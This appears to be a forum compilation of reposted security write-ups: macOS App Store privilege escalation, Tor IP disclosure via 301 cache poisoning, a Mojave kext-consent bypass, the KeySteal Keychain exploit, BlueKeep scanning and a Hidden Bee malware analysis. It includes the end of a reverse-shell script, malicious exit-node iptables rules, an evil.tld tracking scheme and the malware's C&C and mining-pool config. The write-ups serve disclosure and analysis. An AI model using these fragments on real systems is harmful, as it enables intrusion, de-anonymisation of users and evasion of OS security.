        os.dup2(rem.fileno(),2)
        os.putenv("HISTFILE",'/dev/null')
        pty.spawn("/bin/bash")
        s.close()
    	
    if __name__ == "__main__":
        main()

    Reporting to Apple

    I reported this around February to Apple, and tried to explain again in very detailed why I think the entire installation process is still broken, and could be abused.

    The security enhancement

    Apple never admitted this as a security bug, they never assigned a CVE, they considered it as an enhancement. Finally this came with Mojave 10.14.5, and they even mentioned my name on their website.

    image7

    I made a quick test, and it turned out that they eventually managed to fix it properly. If you create the App’s folder, place there files, those will be all wiped. Using FireEye’s Monitor.app we can actually see it. The first event shows that they move the entire folder.

    image8

    Being in Game Of Thrones mood I imagine it like this:

    image9

    The following event shows that they install the application into its proper location:

    image10

    So you can no longer drop there your files, etc…

    I like the way this got fixed eventually, and I would like to thank Apple for that.

    I would like to also thank for Patrick Wardle who was really helpful whenever I turned to him with my n00b macOS questions.

    To be continued…

    The story goes on, as I bypassed Apple’s fix. An update will follow once they fixed the issue.

     

    Sursa: https://theevilbit.github.io/posts/getting_root_with_benign_appstore_apps/

  13. Disclosing Tor users' real IP address through 301 HTTP Redirect Cache Poisoning

    Written on May 29, 2019

    This blog post describes a practical application of the ‘HTTP 301 Cache Poisoning” attack that can be used by a malicious Tor exit node to disclose real IP address of chosen clients.

    PoC Video

    • Client: Chrome Canary (76.0.3796.0)
    • Client real IP address: 5.60.164.177
    • Client tracking parameter: 6b48c94a-cf58-452c-bc50-96bace981b27
    • Tor exit node IP address: 51.38.150.126
    • Transparent Reverse Proxy: tor.modlishka.io (Modlishka - updated code to be released.)

    Note: In this scenario Chrome was configured, through SOCKS5 settings, to use the Tor network. Tor circuit was set to a particular Tor test exit node: ‘51.38.150.126’. This is also a proof-of-concept and many things can be further optimized…

    On the malicious Tor exit node all of the traffic is being redirect to Modlishka proxy:

    iptables -A OUTPUT -p tcp -m tcp --dport 80 -j DNAT --to-destination ip_address:80
    iptables -A FORWARD -j ACCEPT
    

    Watch the videohttps://vimeo.com/339586722

    Example Attack Scenario Description

    Assumptions:

    • Browser-based application (in this case a standard browser) that will connect through the Tor network and, finally, through a malicious Tor exit node.
    • Malicious Tor exit node that is intercepting and HTTP 301 cache poisoning all of the non-tls HTTP traffic.

    Disclosing Tor client IP address

    Lets consider the following attack scenario steps:

    1. User connects to the Internet through the Tor network either by setting up browsers’ settings to use the Tor SOCKS5 or system wide, where the whole OS traffic is being routed through the TOR network.
    2. User begins his typical browsing session with his favorite browser, where usually a lot of non-TLS HTTP traffic is being sent through the Tor tunnel.
    3. Evil Tor exit node intercepts those non-TLS requests and responds with a HTTP 301 permanent redirect to each of them. These redirects will be cached permanently by the browser and will point to a tracking URL with an assigned TOR client identifier. The tracking URL can be created in the following way: http://user-identifier.evil.tld. Where ‘evil.tld’ will collect all source IP information and redirect clients to the originally requested hosts … or, as an alternative, to a transparent reverse proxy that will try to intercept all of the clients subsequent HTTP traffic flow. Furthermore, since it is also possible to carry out an automated cache pollution for the most popular domains (as described in the previous post), e.g. TOP Alexa 100 , an attacker can maximize his chances of disclosing the real IP address.
    4. User, after closing the Tor session, will switch back to his usual network.
    5. As soon user types into the URL address bar one of the previously poisoned entries, e.g. “google.com,” browser will use the cache and internally redirect to the tracking URL with an exit-node context identifier.
    6. Exit node will now be able to correlate previously intercepted HTTP request and users’ real IP address through the information gathered on the external host that used tracking URL with user identifier. The evil.tld host will have information about all of the IP addresses that were used to access that tracking URL.

    Obviously, this gives a possibility to effectively correlate chosen HTTP requests with the client IP address by the Tor exit node. This is because the previously generated tracking URL will be requested by the client through the Tor tunell and later, after connecting through a standard ISP connection, again. This is because of the poisoned cache entries.

    Another approach, might rely on injecting modified JavaScript with embeded tracking URLS into the relevant non-TLS responses and setting up the right Cache control headers (e.g. to ‘Cache-Control: max-age=31536000’). However, this approach wouldn’t be very effective.

    Tracking users through standard cookies, by different web applications is also possible, but it’s not easy to force the client to visit the same, attacker-controlled, domain twice: once while it’s connecting through the Tor exit node and later after it switched back to the standard ISP connection.

    Conclusions

    The fact that it is possible to achieve certain persistency in browsers cache, by injecting poisoned entries, can be abused by an attacker to disclose real IP address of the Tor users that send non-TLS HTTP traffic through malicious exit nodes. Furthermore, poisoning a significant number of popular domain names will increase the likelihood of recieving a callback HTTP request (with assigned user identifier), that will allow to disclose users real IP. An attempt can be also made to ‘domain hook’ some of the browser-based clients and hope that a mistyped domain name will not be noticed by the user or will not be displayed (e.g. mobile application WebViews).

    Possible mitigation:

    • When connecting through the Tor network ensure that all non-TLS traffic is disabled. Example browser plugins that can be used: “Firefox”“Chrome”.
    • Additionally, always use browser ‘private’ mode for browsing through Tor.
    • Do not route all of your OS traffic through Tor without ensuring that there TLS traffic only…
    • Use latest version of the Tor browser whenever possible for browsing web pages.

    References

       

     

    Sursa: https://blog.duszynski.eu/tor-ip-disclosure-through-http-301-cache-poisoning/

  14. How to bypass Mojave 10.14.5’s new kext security

    vboxkext02.jpg?w=683

    I fear with the onset of notarization, this scenario is going to become increasingly common: you’ve just tried to install software which you understand includes at least one kernel extension, and has worked fine before macOS 10.14.5 (which you’re running). The install fails for no apparent reason. What do you do next?

    vboxkext02

    The probable cause is that one or more of the kernel extensions haven’t been notarized, and the security system in macOS has taken exception to that, refusing to install them. Of course there are a thousand and one other possible reasons, but here I’ll assume it’s the result of this change in security. Check first to ensure that you’re not overlooking the normal security dialog, which invites you to open the Security & Privacy pane and agree to the extensions being installed there.

    vboxkext03

    The only piece of information that you require is the developer ID of those kernel extensions. The simplest way to obtain this now is to open the Installer package using Suspicious Package.

    kextinstall10

    There, locate one of the kernel extensions, open the contextual menu, and export that whole kext (the folder with the extension .kext) to your Downloads folder.

    To get the developer ID and check whether that extension has been notarized in one fell swoop, use the spctl command in the form
    spctl -a -vv -t install mykext.kext
    One easy way to do this is to type most of the command
    spctl -a -vv -t install
    then drag and drop the extension from your Downloads folder to the end of that line, where its path and name should appear, e.g.
    /Users/hoakley/Downloads/VBoxDrv.kext

    Then press Return, and you should see three lines of response:
    mykext.kext: accepted
    source=Developer ID
    origin=Developer ID Application: DeveloperName (NJ2ABCUVC1)

    If the extension is notarized already, they will instead look like
    mykext.kext: accepted
    source=Notarized Developer ID
    origin=Developer ID Application: DeveloperName (NJ2ABCUVC1)

    Make a note on paper or your iOS device of the developer ID provided in parentheses, as you’ll need those in a few moments.

    Close your apps down and restart your Mac in Recovery mode. There, open Terminal and type in the command
    /usr/sbin/spctl kext-consent add NJ2ABCUVC1
    where the code at the end is exactly the same as the developer ID which you just obtained from spctl. Press Return, wait for the command prompt to appear again, then quit Terminal and restart in normal mode.

    Now when you try running the Installer package, you should find that its extensions install correctly, as you’ve bypassed the new kext security controls.

    Please let the developer know of your problems and this workaround: they need to get their kernel extensions notarized to spare other users of this same rigmarole.

    New spctl features and wrinkles

    The man page for spctl hasn’t been updated for over six years, but in 2017 it gained a set of actions to handle kernel extensions and your consent for them to be installed – what Apple terms User Approved or Secure Kernel Extension loading. You should be able to see these if you call spctl with the -h option. These kext-consent commands only work when you’re booted in Recovery mode: they should return errors if you’re running in regular mode.

    This appears to unblock kernel extensions which macOS won’t install because they don’t comply with the new rules on notarization, presumably by adding the kernel extension to the new whitelist which was installed as part of the macOS 10.14.5 update. Kernel extensions which are correctly notarized should result in the display of the consent dialog taking the user to Security & Privacy; those which aren’t and don’t appear in the whitelist are simply blocked and not installed now.

    To show whether the normal system for obtaining user consent to install extensions is enabled:
    spctl kext-consent status

    To enable the normal system for obtaining user consent:
    spctl kext-consent enable
    and disable to disable, of course.

    To list the developer IDs which are allowed to load extensions without user consent
    spctl kext-consent list

    To add a developer ID to the list of those allowed to load kernel extensions without user consent
    spctl kext-consent add [devID]
    as used above, and remove to remove that.

    It is strange that this control using kext-consent works at a developer ID level, thus applies to all kernel extensions from that developer, whereas notarization is specific to an individual release of a certain code bundle from that developer.

     

    Sursa: https://eclecticlight.co/2019/06/01/how-to-bypass-mojave-10-14-5s-new-kext-security/

  15. KeySteal

    KeySteal is a macOS <= 10.13.3 Keychain exploit that allows you to access passwords inside the Keychain without a user prompt.
    KeySteal consists of two parts:

    1. KeySteal Daemon: This is a daemon that exploits securityd to get a session that is allowed to access the Keychain without a password prompt.
    2. KeySteal Client: This is a library that can be injected into Apps. It will automatically apply a patch that forces the Security Framework to use the session of our keysteal daemon.

    Building and Running

    1. Open the KeySteal Xcode Project
    2. Build the keystealDaemon and keystealClient
    3. Open the directory which contains the built daemon and client (right cick on keystealDaemon -> Open in Finder)
    4. Run dump-keychain.sh

    TODO

    Add a link to my talk about this vulnerability at Objective by the Sea

    License

    For most files, see LICENSE.txt.
    The following files were taken (or generated) from Security-58286.220.15 and are under the Apple Public Source License:

    • handletypes.h
    • ss_types.h
    • ucsp_types.h
    • ucsp.hpp
    • ucspUser.cpp

    A copy of the Apple Public Source License can be found here.

     

    Sursa: https://github.com/LinusHenze/Keysteal

    • Haha 1
  16.  

    By its nature, networking code is both complex and security critical. Any data received from the network is potentially malicious and therefore needs to be handled extremely carefully. However, the multitude of different networking protocols, such as IP, IPv6, TCP, and UDP, inevitably make the networking code very complicated, thereby making it more difficult to ensure that the code is bug free. For example, many of the functions in Apple’s networking code are thousands of lines long, with a huge number of different control flow paths to handle all the possible flags and options.

    Over the course of 2018, I found and reported a number of RCE vulnerabilities in iOS and macOS, all related to mbuf processing in Apple’s XNU operating system kernel: CVE-2018-4249, -4259, -4286, -4287, -4288, -4291, -4407, -4460. The mbuf datatype is used by the networking code in XNU to store and process all incoming and outgoing network packets.

    In this talk I will explain some of the low level details of how network packets are structured, and how the mbuf datatype is used to process them in XNU. I will discuss some of the corner cases that were handled incorrectly in XNU, making the code vulnerable to remote attack. I will also talk about how I discovered each vulnerability using custom-written variant analysis with Semmle QL (http://github.com/Semmle/QL), a research technique that complements other bug-finding techniques such as fuzzing. To finish off, I will explain the C programming techniques that I used to implement PoC exploits for each of these vulnerabilities, with demonstrations of these exploits in action (crashing the kernel).

  17. Friday, May 31, 2019

    Avoiding the DoS: How BlueKeep Scanners Work

     

    Background 

    On May 21, @JaGoTu and I released a proof-of-concept GitHub for CVE-2019-0708. This vulnerability has been nicknamed "BlueKeep".

    Instead of causing code execution or a blue screen, our exploit was able to determine if the patch was installed.

    msfscanner.PNG

    Now that there are public denial-of-service exploits, I am willing to give a quick overview of the luck that allows the scanner to avoid a blue screen and determine if the target is patched or not.

    RDP Channel Internals 

    The RDP protocol has the ability to be extended through the use of static (and dynamic) virtual channels, relating back to the Citrix ICA protocol.

    The basic premise of the vulnerability is that there is the ability to bind a static channel named "MS_T120" (which is actually a non-alpha illegal name) outside of its normal bucket. This channel is normally only used internally by Microsoft components, and shouldn't receive arbitrary messages.

    There are dozens of components that make up RDP internals, including several user-mode DLLs hosted in a SVCHOST.EXE and an assortment of kernel-mode drivers. Sending messages on the MS_T120 channel enables an attacker to perform a use-after-free inside the TERMDD.SYS driver.

    That should be enough information to follow the rest of this post. More background information is available from ZDI.

    MS_T120 I/O Completion Packets 

    After you perform the 200-step handshake required for the (non-NLA) RDP protocol, you can send messages to the individual channels you've requested to bind.

    The MS_T120 channel messages are managed in the user-mode component RDPWSX.DLL. This DLL spawns a thread which loops in the function rdpwsx!IoThreadFunc. The loop waits via I/O completion port for new messages from network traffic that gets funneled through the TERMDD.SYS driver.

    iothreadfunc.PNG

    Note that most of these functions are inlined on Windows 7, but visible on Windows XP. For this reason I will use XP in screenshots for this analysis.

    MS_T120 Port Data Dispatch 

    On a successful I/O completion packet, the data is sent to the rdpwsx!MCSPortData function. Here are the relevant parts:

    mcsportdata.png

    We see there are only two valid opcodes in the rdpwsx!MCSPortData dispatch:

    • 0x0 - rdpwsx!HandleConnectProviderIndication
    • 0x2 - rdpwsx!HandleDisconnectProviderIndication + rdpwsx!MCSChannelClose

    If the opcode is 0x2, the rdpwsx!HandleDisconnectProviderIndication function is called to perform some cleanup, and then the channel is closed with rdpwsx!MCSChannelClose.

    Since there are only two messages, there really isn't much to fuzz in order to cause the BSoD. In fact, almost any message dispatched with opcode 0x2, outside of what the RDP components are expecting, should cause this to happen.

    Patch Detection 

    I said almost any message, because if you send the right sized packet, you will ensure that proper cleanup is performed:

    handledisconnectproviderindication.PNG

    It's real simple: If you send a MS_T120 Disconnect Provider (0x2) message that is a valid size, you get proper clean up. There should not be risk of denial-of-service.

    The use-after-free leading to RCE and DoS only occurs if this function skips the cleanup because the message is the wrong size!

    Vulnerable Host Behavior 

    On a VULNERABLE host, sending the 0x2 message of valid size causes the RDP server to cleanup and close the MS_T120 channel. The server then sends a MCS Disconnect Provider Ultimatum PDU packet, essentially telling the client to go away.

    And of course, with an invalid size, you RCE/BSoD.

    Patched Host Behavior 

    However on a patched host, sending the MS_T120 channel message in the first place is a NOP... with the patch you can no longer bind this channel incorrectly and send messages to it. Therefore, you will not receive any disconnection notice.

    In our scanner PoC, we sleep for 5 seconds waiting for the MCS Disconnect Provider Ultimatum PDU, before reporting the host as patched.

    CPU Architecture Differences 

    Another stroke of luck is the ability to mix and match the x86 and x64 versions of the 0x2 message. The 0x2 messages require different sizes between the two architectures, which one might think sending both at once should cause the denial-of-service.

    originalrdp.PNG

    Simply, besides the sizes being different, the message opcode is in a different offset. So on the opposite architecture, with a 0'd out packet (besides the opcode), it will think you are trying to perform the Connect 0x0 message. The Connect 0x0 message requires a much larger message and other miscellaneous checks to pass before proceeding. The message for another architecture will just be ignored.

    This difference can possibly also be used in an RCE exploit to detect if the target is x86 or x64, if a universal payload is not used.

    Conclusion 

    This is an interesting quirk that luckily allows system administrators to quickly detect which assets remain unpatched within their networks. I released a similar scanner for MS17-010 about a week after the patch, however it went largely unused until big-name worms such as WannaCry and NotPetya started to hit. Hopefully history won't repeat and people will use this tool before a crisis.

    Unfortunately, @ErrataRob used a fork of our original scanner to determine that almost 1 million hosts are confirmed vulnerable and exposed on the external Internet.

    It is my knowledge that the 360 Vulcan team released a (closed-source) scanner before @JaGoTu and I, which probably follows a similar methodology. Products such as Nessus have now incorporated plugins with this methodology. While this blog post discusses new details about RDP internals related the vulnerability, it does not contain useful information for producing an RCE exploit that is not already widely known.

     
  18. Hidden Bee: Let’s go down the rabbit hole

    Posted: May 31, 2019 by hasherezade 
    Last updated: June 1, 2019

    Some time ago, we discussed the interesting malware, Hidden Bee. It is a Chinese miner, composed of userland components, as well as of a bootkit part. One of its unique features is a custom format used for some of the high-level elements (this format was featured in my recent presentation at SAS).

    Recently, we stumbled upon a new sample of Hidden Bee. As it turns out, its authors decided to redesign some elements, as well as the used formats. In this post, we will take a deep dive in the functionality of the loader and the included changes.

    Sample

    831d0b55ebeb5e9ae19732e18041aa54 – shared by @James_inthe_box

    Overview

    The Hidden Bee runs silently—only increased processor usage can hint that the system is infected. More can be revealed with the help of tools inspecting the memory of running processes.

    Initially, the main sample installs itself as a Windows service:

    added_service.png Hidden Bee service

    However, once the next component is downloaded, this service is removed.

    The payloads are injected into several applications, such as svchost.exe, msdtc.exe, dllhost.exe, and WmiPrvSE.exe.

    injected2.png

    If we scan the system with hollows_hunter, we can see that there are some implants in the memory of those processes:

    scanned_list.png Results of the scan by hollows_hunter

    Indeed, if we take a look inside each process’ memory (with the help of Process Hacker), we can see atypical executable elements:

    malware_modules_implanted.png Hidden Bee implants are placed in RWX memory

    Some of them are lacking typical PE headers, for example:

    malware_module1.png Executable in one of the multiple customized formats used by Hidden Bee

    But in addition to this, we can also find PE files implanted at unusual addresses in the memory:

    pe_files_injected.png Manually-loaded PE files in the memory of WmiPrvSE.exe

    Those manually-loaded PE files turned out to be legitimate DLLs: OpenCL.dll and cudart32_80.dll(NVIDIA CUDA Runtime, Version 8.0.61 ). CUDA is a technology belonging to NVidia graphic cards. So, their presence suggests that the malware uses GPU in order to boost the mining performance.

    When we inspect the memory even closer, we see within the executable implants there are some strings referencing LUA components:

    lua_references-1.png Strings referencing LUA scripting language, used by Hidden Bee components

    Those strings are typical for the Hidden Bee miner, and they were also mentioned in the previous reports.

    We can also see the strings referencing the mining activity, i.e. the Cryptonight miner.

    list.png

    List of modules:

    bin/i386/coredll.bin
    dispatcher.lua
    bin/i386/ocl_detect.bin
    bin/i386/cuda_detect.bin
    bin/amd64/coredll.bin
    bin/amd64/algo_cn_ocl.bin
    lib/amd64/cudart64_80.dll
    src/cryptonight.cl
    src/cryptonight_r.cl
    bin/i386/algo_cn_ocl.bin
    config.lua
    lib/i386/cudart32_80.dll
    src/CryptonightR.cu
    bin/i386/algo_cn.bin
    bin/amd64/precomp.bin
    bin/amd64/ocl_detect.bin
    bin/amd64/cuda_detect.bin
    lib/amd64/opencl.dll
    lib/i386/opencl.dll
    bin/amd64/algo_cn.bin
    bin/i386/precomp.bin

    And we can even retrieve the miner configuration:

      configuration.set("stratum.connect.timeout",20)
      configuration.set("stratum.login.timeout",60)
      configuration.set("stratum.keepalive.timeout",240)
      configuration.set("stratum.stream.timeout",360)
      configuration.set("stratum.keepalive",true)
      configuration.set("job.idle.count",30)
      configuration.set("stratum.lock.count",30)
      configuration.set("miner.protocol","stratum+ssl://r.twotouchauthentication.online:17555/")
      configuration.set("miner.username",configuration.uuid())
      configuration.set("miner.password","x")
      configuration.set("miner.agent","MinGate/5.1")
    view rawconfig.lua hosted with ❤ by GitHub

    Inside

    Hidden Bee has a long chain of components that finally lead to loading of the miner. On the way, we will find a variety of customized formats: data packages, executables, and filesystems. The filesystems are going to be mounted in the memory of the malware, and additional plugins and configuration are retrieved from there. Hidden Bee communicates with the C&C to retrieve the modules—on the way also using its own TCP-based protocol.

    The first part of the loading process is described by the following diagram:

    hidden_bee_loader-2.png

    Each of the .spk packages contains a custom ‘SPUTNIK’ filesystem, containing more executable modules.

    bee_plugins-1.png

    Starting the analysis from the loader, we will go down to the plugins, showing the inner workings of each element taking part in the loading process.

    The loader

    In contrast to most of the malware that we see nowadays, the loader is not packed by any crypter. According the header, it was compiled in November 2018.

    compile_time.png

    While in the former edition the modules in the custom formats were dropped as separate files, this time the next stage is unpacked from inside the loader.

    The loader is not obfuscated. Once we load it with typical tools (IDA), we can clearly see how the new format is loaded.

    to_load_custom.png The loading function

    Section .shared contains the configuration:

    section_shared.png Encrypted configuration. The last 16 bytes after the data block is the key.

    The configuration is decrypted with the help of XTEA algorithm.

    decrypt_config.png Decrypting the configuration

    The decrypted configuration must start from the magic WORD “pZ.” It contains the C&C and the name under which the service will be installed:

    decrypted_config.png

    Unscrambling the NE format

    The NE format was seen before, in former editions of Hidden Bee. It is just a scrambled version of the PE. By observing which fields have been misplaced, we can easily reconstruct the original PE.

    unpack_from_loader.png The loader, unpacking the next stage

    NE is one of the two similar formats being used by this malware. Another similar one starts from a DWORD 0x0EF1FAB9 and is used to further load components. Both of them have an analogical structure that comes from slightly modified PE format:

    reconstruct_pe-1.png

    Header:

    WORD magic; // 'NE'
    WORD pe_offset;
    WORD machine_id; 

    The conversion back to PE format is trivial: It is enough to add the erased magic numbers: MZ and PE, and to move displaced fields to their original offsets. The tool that automatically does the mentioned conversion is available here.

    In the previous edition, the parts of Hidden Bee with analogical functionality were delivered in a different, more complex proprietary format than the one currently being analyzed.

    Second stage: a downloader (in NE format)

    As a result of the conversion, we get the following PE: (fddfd292eaf33a490224ebe5371d3275). This module is a downloader of the next stage. The interesting thing is that the subsystem of this module is set as a driver, however, it is not loaded like a typical driver. The custom loader loads it into a user space just like any typical userland component.

    The function at the module’s Entry Point is called with three parameters. The first is a path of the main module. Then, the parameters from the configuration are passed. Example:

     

    0012FE9C     00601A34  UNICODE "\"C:\Users\tester\Desktop\new_bee.exe\""
    0012FEA0     00407104  UNICODE "NAPCUYWKOxywEgrO"
    0012FEA4     00407004  UNICODE "118.41.45.124:9000"

     

    call_module_ep.png Calling the Entry Point of the manually-loaded NE module

    The execution of the module can take one of the two paths. The first one is meant for adding persistence: The module installs itself as a service.

    If the module detects that it is already running as a service, it takes the second path. In such a case, it proceeds to download the next module from the server. The next module is packed as as Cabinet file.

    to_unpack_cabinet.png The downloaded Cabinet file is being passed to the unpacking function

    It is first unpacked into a file named “core.sdb”. The unpacked module is in a customized format based on PE. This time, the format has a different signature: “NS” and it is different from the aforementioned “NE” format (detailed explanation will be given further).

    unpacked_NS_file-600x227.png

    It is loaded by the proprietary loader.

    check_ns_sign.png

    The loader enumerates all the executables in a directory: %Systemroot%\Microsoft.NET\ and selects the ones with the compatible bitness (in the analyzed case it was selecting 32bit PEs). Once it finds a suitable PE, it runs it and injects the payload there. The injected code is run by adding its entry point to APC queue.

    created_process.png Hidden Bee component injecting the next stage (core.sdb) into a new process

    In case it failed to find the suitable executable in that directory, it performs the injection into dllhost.exe instead.

    Unscrambling the NS format

    As mentioned before, the core.sdb is in yet another format named NS. It is also a customized PE, however, this time the conversion is more complex than the NE format because more structures are customized. It looks like a next step in the evolution of the NE format.

    core_sdb.png Header of the NS format

    We can see that the changes in the PE headers are bigger and more lossy—only minimalist information is maintained. Only few Data Directories are left. Also the sections table is shrunk: Each section header contains only four out of nine fields that are in the original PE.

    Additionally, the format allows to pass a runtime argument from the loader to the payload via header: The pointer is saved into an additional field (marked “Filled Data” on the picture).

    Not only is the PE header shrunk. Similar customization is done on the Import Table:

    custom_import_table1.png Customized part of the NS format’s import table

    This custom format can also be converted back to the PE format with the help of a dedicated converter, available here.

    Third stage: core.sdb

    The core.sdb module converted to PE format is available here: a17645fac4bcb5253f36a654ea369bf9.

    The interesting part is that the external loader does not complete the full loading process of the module. It only copies the sections. But the rest of the module loading, such as applying relocations and filling imports, is done internally in the core.sdb.

    coresdb_at_ep_.png The loading function is just at the Entry Point of core.sdb

    The previous component was supposed to pass to the core.sdb an additional buffer with the data about the installed service: the name and the path. During its execution, core.sdb will look up this data. If found, it will delete the previously-created service, and the initial file that started the infection:

    removing_the_service.png Removing the initial service

    Getting rid of the previous persistence method suggests that it will be replaced by some different technique. Knowing previous editions of Hidden Bee, we can suspect that it may be a bootkit.

    After locking the mutex in a format Global\SC_{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, the module proceeds to download another component. But before it goes to download, first, a few things are checked.

    can_continue.png Checks done before download of the next module

    First of all, there is a defensive check if any of the known debuggers or sniffers are running. If so, the function quits.

    blacklisted_names.png The blacklist

    Also, there is a check if the application can open a file ‘\??\NPF-{0179AC45-C226-48e3-A205-DCA79C824051}’.

    If all the checks pass, the function proceeds and queries the following URL, where GET variables contain the system fingerprint:

    sltp://bbs.favcom.space:1108/setup.bin?id=999&sid=0&sz=a7854b960e59efdaa670520bb9602f87&os=65542&ar=0

    The hash (sz=) is an MD5 generated from VolumeIDs. Then follows the (os=) identifying version of the operating system, and the identifier of the architecture (ar=), where 0 means 32 bit, 1 means 64bit.

    The content downloaded from this URL (starting from a magic DWORD 0xFEEDFACE – 79e851622ac5298198c04034465017c0) contains the encrypted package (in !rbx format), and a shellcode that will be used to unpack it. The shellcode is loaded to the current process and then executed.

    load_shellcode-1.png The ‘FEEDFACE’ module contains the shellcode to be loaded

    The shellcode’s start function uses three parameters: pointer to the functions in the previous module (core sdb), pointer to the buffer with encrypted data, size of the encrypted data.

    calling_the_shellcode.png The loader calling the shellcode

    Fourth stage: the shellcode decrypting !rbx

    The beginning of the loaded shellcode:

    shellcode_bgn.png

    The shellcode does not fill any imports by itself. Instead, it fully relies on the functions from core.sdb module, to which it passes the pointer. It makes use of the following function: malloc, mecpy, memfree, VirtualAlloc.

    calling_via_coresdb.png Example: calling malloc via core.sdb

    Its role is to reveal another part. It comes in an encrypted package starting from a marker !rbx. The decryption function is called just at the beginning:

    decrypt_rbx.png Calling the decrypting function (at Entry Point of the shellcode)

    First, the function checks the !rbx marker and the checksum at the beginning of the encrypted buffer:

    checking_the_marker.png Checking marker and then checksum

    It is decrypted with the help of RC4 algorithm, and then decompressed.

    After decryption, the markers at the beginning of the buffer are checked. The expected format must start from predefined magic DWORDs: 0xCAFEBABE,0, 0xBABECAFE:

    check_format.png

    The !rbx package format

    The !rbx is also a custom format with a consistent structure.

    copy_afer_rbx_hdr.png
    DWORD magic; // "!rbx"
    DWORD checksum;
    DWORD content_size;
    BYTE rc4_key[16];
    DWORD out_size;
    BYTE content[];

    The custom file system (BABECAFE)

    The full decrypted content has a consistent structure, reminiscent of a file system. According to the previous reports, earlier versions of Hidden Bee used to adapt the ROMS filesystem, adding few modifications. They called their customized version “Mixed ROM FS”. Now it seems that their customization process has progressed. Also the keywords suggesting ROMFS cannot be found. The headers starts from the markers in the form of three DWORDS: { 0xCAFEBABE, 0, 0xBABECAFE }.

    checkibng_babecafe_format.png

    The layout of BABECAFE FS:

    babecafe_fs-1.png

    We notice that it differs at many points from ROM FS, from which it evolved.

    The structure contains the following files:

    /bin/amd64/coredll.bin
    /bin/i386/coredll.bin
    /bin/i386/preload
    /bin/amd64/preload
    /pkg/sputnik.spk
    /installer/com_x86.dll (6177bc527853fe0f648efd17534dd28b)
    /installer/com_x64.dll
    /pkg/plugins.spk

    The files /pkg/sputnik.spk and /pkg/plugins.spk are both compressed packages in a custom !rsi format.

    rsi_package_bgn.png
    Beginning of the !rsi package in the BABECAFE FS

    Each of the spk packages contain another custom filesystem, identified by the keyword SPUTNIK (possibly the extension ‘spk’ is derived from the SPUTNIK format). They will be unpacked during the next steps of the execution.

    Unpacked plugins.spk: 4c01273fb77550132c42737912cbeb36
    Unpacked sputnik.spk: 36f3247dad5ec73ed49c83e04b120523.

    Selecting and running modules

    Some executables stored in the filesystem are in two version: 32 and 64 bit. Only the modules relevant to the current architecture are loaded. So, in the analyzed case, the loader chooses first: /bin/i386/preload (shellcode) and /bin/i386/coredll.bin (a module in NS custom format). The names are hardcoded in the loader within the loading shellcode:

    loading_modules.png Searching the modules in the custom file system

    After the proper elements are fetched (preload and coredll.bin), they are copied together into a newly-allocated memory area. The coredll.bin is copied just after preload. Then, the preload module is called:

    call_preload.png Redirecting execution to preload

    The preload is position-independent, and its execution starts from the beginning of the page.

    to_enter_preload.png Entering ‘preload’

    The only role of this shellcode is to prepare and run the coredll.bin. So, it contains a custom loader for the NS format that allocates another memory area and loads the NS file there.

    Fifth stage: preload and coredll

    After loading coredll, preload redirects the execution there. 

    coredll_ep.png coredll at its Entry Point

    The coredll patches a function inside the NTDLL— KiUserExceptionDispatcher—redirecting one of the inner calls to its own code:

    patched_kiuserdispatch.png A patch inside KiUserExceptionDispatcher

    Depending on which process the coredll was injected into, it can take one of a few paths of execution.

    If it is running for the first time, it will try to inject itself again—this time into rundll32. For the purpose of the injection, it will again unpack the original !rbx package and use its original copy stored there.

    to_unpack_rbx-1.png Entering the unpacking function checking_magic.png Inside the unpacking function: checking the magic “!rbx”

    Then it will choose the modules depending on the bitness of the rundll32:

    create_rundll32_suspended.png

    It selects the pair of modules (preload/coredll.bin) appropriate for the architecture, either from the directory amd64 or from i386:

    choose_modules.png

    If the injection failed, it makes another attempt, this time trying to inject into dllhost:

    try_inject.png

    Each time it uses the same, hardcoded parameter (/Processid: {...}) that is passed to the created process:

    with_processid.png

    The thread context of the target process is modified, and then the thread is resumed, running the injected content:

    injected_to_rundll32.png

    Now, when we look inside the memory of rundll32, we can find the preload and coredll being mapped:

    rundll32_injected_preload.png

    Inside the injected part, the execution follows a similar path: preload loads the coredll and redirects to its Entry Point. But then, another path of execution is taken.

    The parameter passed to the coredll decides which round of execution it is. On the second round, another injection is made: this time to dllhost.exe. And finally, it proceeds to the final round, when other modules are unpacked from the BABECAFE filesystem.

    to_unpack_spk.png Parameter deciding which path to take

    The unpacking function first searches by name for two more modules: sputnik.spk and plugins.spk. They are both in the mysterious !rsi format, which reminds us of !rbx, but has a slightly different structure.

    find_sputnik_and_plugins.png

    Entering the function unpacking the first !rsi package:

    to_unpack_rsi.png

    The function unpacking the !rsi format is structured similarly to the !rbx unpacking. It also starts from checking the keyword:

    check_rsi_keyword.png Checking “!rsi” keyword

    As mentioned before, both !rsi packages are used to store filesystems marked with the keyword “SPUTNIK”. It is another custom filesystem invented by the Hidden Bee authors that contain additional modules.

    check_sputnik_keyword.png The “SPUTNIK” keyword is checked after the module is unpacked

    Unpacking the sputnik.spk resulted in getting the following SPUTNIK module: 455738924b7665e1c15e30cf73c9c377

    check_sputnik_format.png

    It is worth noting that the unpacked filesystem has inside of it four executables: two pairs consisting of NS and PE, appropriately 32 and 64 bit. In the currently-analyzed setup, 32 bit versions are deployed.

    The NS module will be the next to be run. First, it is loaded by the current executable, and then the execution is redirected there. Interestingly, both !rsi modules are passed as arguments to the entry point of the new module. (They will be used later to retrieve more components.)

    call_another.png Calling the newly-loaded NS executable

    Sixth stage: mpsi.dll (unpacked from SPUTNIK)

    Entering into the NS module starts another layer of the malware:

    call_ns_ep.png Entry Point of the NS module: the !rsi modules, perpended with their size, are passed

    The analyzed module, converted to PE is available here: 537523ee256824e371d0bc16298b3849

    This module is responsible for loading plugins. It will also create a named pipe through which it is will communicate with other modules. It sets up the commands that are going to be executed on demand.

    This is how the beginning of the main function looks:

    start_main.png

    Like in previous cases, it starts from finishing to load itself (relocations and imports). Then, it patches the function in NTDLL. This is a common prolog in many HiddenBee modules.

    Then, we have another phase of loading elements from the supplied packages. The path that will be taken depends on the runtime arguments. If the function received both !rsi packages, it will start by parsing one of them, retrieving loading submodules.

    First, the SPUTNIK filesystem must be unpacked from the !rsi package:

    unpack_and_mount_plugins.png

    After being unpacked, it is mounted. The filesystems are mounted internally in the memory: A global structure is filled with pointers to appropriate elements of the filesystem.

    retrieve_plugins.png

    At the beginning, we can see the list of the plugins that are going to be loaded: cloudcompute.apideepfreeze.api, and netscan.api. Those names are being appended to the root path of the modules.

    rootpath.png

    Each module is fetched from the mounted filesystem and loaded:

    load_plugin.png Calling the function to load the plugin

